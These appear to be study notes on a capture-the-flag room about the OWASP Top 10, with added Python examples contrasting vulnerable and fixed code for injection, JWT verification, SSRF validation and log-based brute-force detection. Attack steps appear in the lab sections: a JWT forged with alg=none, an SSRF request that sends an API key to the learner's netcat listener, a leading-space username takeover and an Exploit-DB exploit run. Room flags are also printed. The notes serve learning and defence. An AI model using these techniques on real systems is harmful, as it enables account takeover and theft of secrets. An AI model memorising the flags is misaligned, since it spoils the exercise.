# OWASP Top 10 2021

### Task 3.4 - Broken Access Control (IDOR Challenge)

**What is it?**

Insecure Direct Object Reference (IDOR) = being able to access resources you wouldn't ordinarily be allowed to see.

***

### Task 5.6.7 - Cryptographic Failures

**What is it?**

Cryptographic Failure = misuse (or lack of use) of cryptographic algorithms

**Challenge**

How to read a `.db` [database] file.

***

### Task 9.10 - Injection

**SQL Injection**

Occurs when user-controlled input is passed to SQL queries

**Command Injection**

Occurs when user input is passed to system commands

Prevention = use an allow list and strip input before it reaches the query or command.
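Added example (not from the room or this page): the two injection classes above in Python, each vulnerable form beside its fix. The table, the users and the `ping` wrapper are constructed for the demo.

```python
import re
import sqlite3
import subprocess

def make_db():
    # Constructed in-memory table standing in for the application's user data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("darren", "darren@example.com"), ("arthur", "arthur@example.com")])
    return conn

def lookup_vulnerable(conn, username):
    # Vulnerable: user-controlled input is pasted into the SQL text, so a quote in
    # the input closes the string literal and whatever follows is parsed as SQL.
    sql = f"SELECT email FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, username):
    # Fixed: a bound parameter travels as data and cannot change the query's shape.
    sql = "SELECT email FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

# Allow list describing the only kind of value the command expects: a hostname or IP.
HOST_ALLOWED = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

def host_is_allowed(host):
    return HOST_ALLOWED.fullmatch(host) is not None

def build_ping_argv(host):
    # Fixed command injection: reject anything outside the allow list, then hand the
    # value over as one argv element (no shell), so ';', '|' or '&&' are never parsed.
    if not host_is_allowed(host):
        raise ValueError("host rejected by allow list")
    return ["ping", "-c", "1", host]

def ping(host):
    # shell=False: the OS receives argv directly. The vulnerable pattern this replaces
    # is os.system("ping -c 1 " + host), where the whole string is parsed by /bin/sh.
    return subprocess.run(build_ping_argv(host), capture_output=True, text=True).returncode
```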

***

### Task 11 - Insecure Design

**What is it?**

Refers to vulnerabilities which are inherent to the application's architecture.

***

### Task 12 - Security Misconfiguration

**What is it?**

Distinct from the other Top 10 vulnerabilities, these occur when security has not been appropriately configured.

Examples include:

* Poorly configured permissions on cloud services, like S3 buckets.
* Having unnecessary features enabled, like services, pages, accounts or privileges.
* Default accounts with unchanged passwords.
* Error messages that are overly detailed and allow attackers to find out more about the system.
* Not using HTTP security headers.

`Example:` an exposed Werkzeug console that lets us execute Python code.

***

### Task 13.14.15 - Vulnerable and Outdated Components

**What is it?**

Occasionally you may find that the company/entity is using a program with a well-known vulnerability.

<https://www.exploit-db.com/exploits/41962>

**Exploit**

We take the software name and version number and search for them on [Exploit-DB](https://www.exploit-db.com/).

Sometimes we need to fix bugs in, or otherwise modify, the downloaded scripts.

**Lab**

`Start:` the target is a PHP book store (CSE) with a MySQL database.

`In ExploitDB:` verify the version, download the exploit and run it. [Link exploit -> 48960](https://www.exploit-db.com/exploits/48960)

Flag: `THM{But_1ts_n0t_my_f4ult!}`

***

### Task 16.17 - Identification and Authentication Failures

**What is it?**

Authentication and session management constitute core components of modern web applications.

`Common flaws:`

* Brute force attacks
* Use of weak credentials
* Weak session cookies: if session cookies contain predictable values, attackers can set their own session cookies and access users' accounts.

`Mitigation:`

* To avoid password-guessing attacks, enforce a strong password policy.
* To avoid brute-force attacks, limit the number of login attempts.

`Example of 'Basics of attacking the authentication systems':` there is an existing user named 'darren'; we can access that account by registering a new user as ' darren' (with a leading space).

***

### Task 18.19.20 - Software and Data Integrity Failures

**What is Integrity?**

Integrity means ascertaining that a piece of data remains unmodified. **Example**: when downloading and installing the latest version of a program, how can we know that it wasn't modified, or damaged by a transmission error, while downloading?

`Hash:` the publisher advertises the file's hash; after downloading the file we recalculate the hash and compare.

`To calculate and check the hashes in Linux:`

```bash
md5sum file
sha1sum file
sha256sum file
```

**Software Integrity Failures**

When a website uses third-party libraries, for example `https://code.jquery.com/jquery-3.6.1.min.js`, the content served at that URL could be changed to inject malicious code.

Modern browsers allow specifying a hash alongside the library's URL, a mechanism called Subresource Integrity (SRI).

`How:` in [srihash](https://www.srihash.org/) we can generate the script tag for a URL together with its hash.

```html
<!-- Ex.: https://code.jquery.com/jquery-1.12.4.min.js -> -->
<script src="https://code.jquery.com/jquery-1.12.4.min.js" integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous">
</script>
```

**Data Integrity Failures**

Cookies are key-value pairs stored in the browser. If a cookie carries the username and the user tampers with it, changing the username, he can access another user's emails. One solution is JSON Web Tokens (JWT), which provide proof of integrity using cryptography.

`JWTs are very simple tokens:` a header, a payload and a signature.

`Lab:`

* In Burp Suite, intercept the request.
* Inspect the cookie in Burp Suite.
* Exploit: set `alg` to `none` and `user` to `admin`.
* Apply the changes and observe the response.
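Added example (not the lab's server code): an HS256 JWT issued and then verified two ways, the vulnerable way that honours `alg=none` from the header and the fixed way that pins the algorithm. The secret key is constructed; the lab's key is not on the page.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"   # constructed; the lab server's key is not on the page

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(payload):
    # Server-side issuance: header.payload, then HMAC-SHA256 over that string.
    header = b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def tampered_none_token(payload):
    # The lab's modified cookie: header says alg=none and the signature part is empty.
    header = b64url_encode(json.dumps({"typ": "JWT", "alg": "none"}).encode())
    return f"{header}.{b64url_encode(json.dumps(payload).encode())}."

def verify_vulnerable(token):
    # Vulnerable: the algorithm is read from the attacker-controlled header, and
    # 'none' means 'no signature', so the payload is trusted unverified.
    header, body, sig = token.split(".")
    if json.loads(b64url_decode(header))["alg"] == "none":
        return json.loads(b64url_decode(body))
    expected = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(body)) if hmac.compare_digest(expected, b64url_decode(sig)) else None

def verify_safe(token):
    # Fixed: the accepted algorithm is pinned server-side, the header only has to
    # agree with it, and the HMAC is always checked with a constant-time compare.
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header, body, sig = parts
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        return None
    expected = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))
```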

***

### Task 21 - Security Logging and Monitoring Failures

**Important**

Logging matters because, in an incident, the attacker's activities (and your own actions) can be traced, so their risk and impact can be determined. Without it:

* Risk of further attacks
* Regulatory damage

`Information stored in logs:`

* HTTP status codes
* Time Stamps
* Usernames
* API endpoints/page locations
* IP addresses
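Added example (not from the room or this page) of what those logged fields buy a defender: a parser for lines carrying exactly the items listed above, and a detector that flags a burst of failed logins from one IP followed by a success. The log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the shape the page lists: timestamp, IP, username, endpoint, status.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.10.14.7 darren POST /login 401
2024-05-01T10:00:02Z 10.10.14.7 arthur POST /login 401
2024-05-01T10:00:03Z 10.10.14.7 admin POST /login 401
2024-05-01T10:00:04Z 10.10.14.7 root POST /login 401
2024-05-01T10:00:05Z 10.10.14.7 guest POST /login 401
2024-05-01T10:00:30Z 10.10.14.7 admin POST /login 200
2024-05-01T10:05:00Z 10.10.55.2 alice POST /login 401
2024-05-01T10:05:03Z 10.10.55.2 alice POST /login 200
this line is not in the expected format
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")

def parse_log(text):
    events, unparsed = [], 0
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            unparsed += 1          # worth alerting on too: a tampered or broken log
            continue
        ts, ip, user, method, path, status = m.groups()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "ip": ip,
                       "user": user, "method": method, "path": path, "status": int(status)})
    return events, unparsed

def detect_login_bruteforce(events, threshold=5, window_seconds=60):
    # One alert per IP with >= threshold 401s on /login inside the window; a later 200
    # from the same IP is the signal that the guessing most likely succeeded.
    by_ip = defaultdict(list)
    for e in (x for x in events if x["path"] == "/login"):
        by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["status"] == 401]
        for i, first in enumerate(fails):
            burst = [f for f in fails[i:]
                     if (f["ts"] - first["ts"]).total_seconds() <= window_seconds]
            if len(burst) >= threshold:
                later_ok = any(e["status"] == 200 and e["ts"] >= burst[-1]["ts"] for e in evs)
                alerts.append({"ip": ip, "failures": len(burst),
                               "usernames": sorted({f["user"] for f in burst}),
                               "followed_by_success": later_ok})
                break
    return alerts
```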

***

### Task 22 - Server-Side Request Forgery (SSRF)

**Practical Example**

`Examine:` the link address of the download button.

`SSRF Request:`

```
http://10.10.170.123:8087/download?server=10.11.41.161:8000&id=75482342
```

`Netcat:` the listener receives the request, including the key:

```
Key: THM{Hello_Im_just_an_API_key}
```
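Added example (not the lab's application code) of how the `server` parameter above should have been handled: parse it without connecting, refuse internal addresses and redirection tricks, and only accept a known destination. The allowed host name is a constructed placeholder, since the lab's real storage host is not on the page.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed allow list: the only backend this /download endpoint should ever contact.
# The lab's real storage host is not on the page, so this name is a placeholder.
ALLOWED_SERVERS = {("storage.example.com", 8087)}

def split_host_port(value):
    # Parse the 'server' parameter as host:port without ever connecting to it.
    parts = urlsplit(value if "//" in value else f"//{value}")
    if parts.username or parts.password or parts.path or parts.query or parts.fragment:
        return None   # 'a@b', paths and queries are redirection tricks, not a server name
    try:
        return parts.hostname, parts.port   # .port raises ValueError when out of range
    except ValueError:
        return None

def is_internal_address(host):
    # Literal IPs in loopback/private/link-local/reserved ranges are where an SSRF is
    # usually pointed (LAN hosts, services bound to localhost); never fetch from them.
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False      # a hostname; the allow list below decides for those
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def validate_server_param(value):
    # Both checks together: a known destination, and never an internal address.
    hp = split_host_port(value)
    if hp is None or hp[0] is None or hp[1] is None:
        return False
    if is_internal_address(hp[0]):
        return False
    return hp in ALLOWED_SERVERS

def download_url(server_param, file_id):
    # Build the outbound URL only after validation; otherwise refuse the request.
    if not validate_server_param(server_param):
        raise ValueError("server parameter rejected")
    host, port = split_host_port(server_param)
    return f"http://{host}:{port}/{file_id}"
```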

